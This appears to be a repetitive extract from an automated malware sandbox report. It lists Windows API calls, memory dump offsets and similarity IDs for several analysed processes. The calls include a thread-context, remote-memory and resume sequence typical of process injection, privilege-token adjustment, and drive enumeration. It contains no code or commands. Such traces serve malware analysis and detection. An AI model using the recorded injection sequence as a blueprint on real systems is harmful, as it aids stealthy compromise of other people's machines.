                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 002D38BE
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002D4348
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002D3D86
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002D3D86
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181395845.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181395845.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0211AD37
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0211AD37
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0211B329
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0211B329
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028801D0
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0288072D
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02880DD6
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 0211BDBC
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 0211AFBE
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0288109E
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 0211B0AE
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0211A23E
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 02880819
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02880502
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0288072D
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 028808E5
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0211A94A
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02880DD6
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 0211BDBC
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 0211B0AE
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02880FB0
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0211AB1A
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02881148
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 0211AFBE
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0211BA7E
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 028808E5
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0288132F
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02880640
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0211AA71
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0211AB1A
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0288099C
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 02880819
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0211ABC9
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0211BA7E
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0211A23E
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028801D0
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0288109E
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0288132F
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0211A94A
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02880502
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02880FB0
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02880640
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0211ABC9
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02881148
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0288099C
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0211AA71
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0211A9C8
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0211A9C8
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134414581.0000000002112000.00000040.00000001.sdmp, Offset: 02112000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134414581.0000000002112000.00000040.00000001.sdmp, Offset: 02112000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01CAAD37
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01CAAD37
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01CAB329
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01CAB329
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01CAA23E
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028401D0
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0284072D
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02840DD6
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 01CABDBC
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 01CAAFBE
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
